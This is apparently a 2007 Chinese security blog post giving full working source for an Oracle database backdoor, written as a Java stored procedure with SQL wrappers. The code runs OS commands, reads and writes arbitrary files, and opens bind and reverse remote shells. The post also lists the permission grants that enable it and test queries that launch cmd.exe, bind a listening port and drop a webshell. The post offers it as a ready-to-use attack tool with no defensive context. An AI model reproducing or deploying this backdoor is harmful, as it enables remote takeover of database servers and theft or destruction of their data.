ORACLE(SQLJ-SHELL)
csharebox
reate or replace and compile java source named isto as
import java.io.*;
import java.net.*;
public class ISTO{
//author: kj021320
//team: I.S.T.O
public static String listFolder(String path){
File f=null;
String str="";
f=new File(path);
String[] files=f.list();
if(files!=null)
for(int i=0;i<files.length;i++){
str+=files[i]+"
";
}
return str;
}
public static String saveFile(String filepath,String value){
FileOutputStream fos=null;
try {
fos=new FileOutputStream(filepath);
fos.write(value.getBytes());
return "OK";
} catch (Exception e) {
return e.getMessage();
} finally{
if(fos!=null){
try {fos.close();} catch (Exception e) {}
}
}
}
public static String readFile(String pathfile,String code){
BufferedReader br=null;
String value="";
try {
br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code));
String s=null;
while((s=br.readLine())!=null){
value+=s;
}
return value;
} catch (Exception e) {
return e.getMessage();
} finally{
if(br!=null){try {br.close();} catch (IOException e) {}}
}
}
public static String execFile(String filepath,String code){
int i=0;
Runtime rt=Runtime.getRuntime();
String output="";
InputStreamReader isr = null;
char[] bufferC=new char[1024];
try{
Process ps=rt.exec(filepath);
isr=new InputStreamReader(ps.getInputStream(),code);
while((i=isr.read(bufferC,0,bufferC.length))!=-1){
output+=new String(bufferC,0,i);
}
return output;
}catch(Exception e){
return e.getMessage();
}finally{
if(isr!=null)try {isr.close();} catch (IOException e) {}
}
}
public static String bindShell(int port){
ServerSocket ss=null;
Socket s=null;
try {
ss = new ServerSocket(port);
s=ss.accept();
new optShell(ss,s).start();
return "OK";
} catch (Exception e) {
return e.getMessage();
}
}
public static String reverseShell(String host,int port){
Socket s=null;
try{
s=new Socket(host,port);
new optShell(null,s).start();
return "OK";
}catch(Exception e){
return e.getMessage();
}
}
public static class optShell extends Thread{
OutputStream os=null;
InputStream is=null;
ServerSocket ss;
Socket s;
public optShell(ServerSocket ss,Socket s){
this.ss=ss;
this.s=s;
try{
this.is=s.getInputStream();
this.os=s.getOutputStream();
}catch(Exception e){
if(os!=null)try {os.close();} catch(Exception ex) {}
if(is!=null)try {is.close();} catch(Exception ex) {}
if(s!=null)try {s.close();} catch(Exception ex) {}
if(ss!=null)try {ss.close();} catch(Exception ex) {}
}
}
public void run(){
BufferedReader br=new BufferedReader(new InputStreamReader(is));
String line="";
String cmdhelp="Command:
list
save
read
exec
exit
";
try {
//os.write(cmdhelp.getBytes());
line=br.readLine();
while(!"exit".equals(line)){
if(line.length()>3){
StringBuffer sb=new StringBuffer(line.trim());
String cmd=sb.substring(0, 4);
if(cmd.equals("list")){
os.write("input you path:
".getBytes());
line=br.readLine();
os.write(listFolder(line).getBytes());
}else if("save".equals(cmd)){
os.write("input you filepath:
".getBytes());
line=br.readLine();
os.write("input you value:
".getBytes());
os.write(saveFile(line,br.readLine()).getBytes());
}else if("read".equals(cmd)){
os.write("input you filepath:
".getBytes());
line=br.readLine();
os.write("input you code examle:GBK
".getBytes());
os.write(readFile(line,br.readLine()).getBytes());
}else if("exec".equals(cmd)){
os.write("input you run filepath:
".getBytes());
line=br.readLine();
os.write("input you code examle:GBK
".getBytes());
os.write(execFile(line,br.readLine()).getBytes());
}else{
os.write(cmdhelp.getBytes());
}
}else{
os.write(cmdhelp.getBytes());
}
line=br.readLine();
}
} catch (Exception e) {
e.printStackTrace();
}finally{
if(os!=null)try {os.close();} catch(Exception e) {}
if(is!=null)try {is.close();} catch(Exception e) {}
if(s!=null)try {s.close();} catch(Exception e) {}
if(ss!=null)try {ss.close();} catch(Exception e) {}
}
}
}
}
以上建立完成之后 需要用ORACLE的函数调用JAVA的静态方法
--列举目录函数
create or replace function ISTO_LISTFOLDER(str varchar2) return varchar2
as language java name ISTO.listFolder(java.lang.String) return java.lang.String;
--保存文件函数
create or replace function ISTO_SAVEFILE(p varchar2,v varchar2) return varchar2
as language java name ISTO.saveFile(java.lang.String,java.lang.String) return java.lang.String;
--读文件函数
create or replace function ISTO_READFILE(p varchar2,c varchar2) return varchar2
as language java name ISTO.readFile(java.lang.String,java.lang.String) return java.lang.String;
--运行文件函数
create or replace function ISTO_EXECFILE(fp varchar2,c varchar2) return varchar2
as language java name ISTO.execFile(java.lang.String,java.lang.String) return java.lang.String;
--端口绑定 你可以telnet进去
create or replace function ISTO_BINDSHELL(port number) return varchar2
as language java name ISTO.bindShell(int) return java.lang.String;
以上函数转换操作之后 需要给JAVA授予访问权限
begin
Dbms_Java.Grant_Permission(用户名字,java.io.FilePermission,<<ALL FILES>>,read,write,execute,delete);
Dbms_Java.Grant_Permission(用户名字,java.lang.RuntimePermission,*,writeFileDescriptor);
Dbms_Java.grant_permission(用户名字,java.net.SocketPermission,*:*,accept,connect,listen,resolve);
end;
然后就可以进行文件操作以及 运行程序 开启网络!
以下为测试代码
SELECT ISTO_LISTFOLDER(/usr) FROM DUAL
SELECT ISTO_EXECFILE(C:WINDOWSsystem32cmd.exe /c dir c:,GBK) FROM DUAL;
SELECT ISTO_READFILE(/tmp/1.txt,GBK) FROM DUAL;
SELECT ISTO_SAVEFILE(/tmp/1.txt,一句话shell) FROM DUAL;
SELECT ISTO_BINDSHELL(20000) FROM DUAL
发表于 @ 2007年09月08日 13:36:00
补充:综合编程 , 安全编程 ,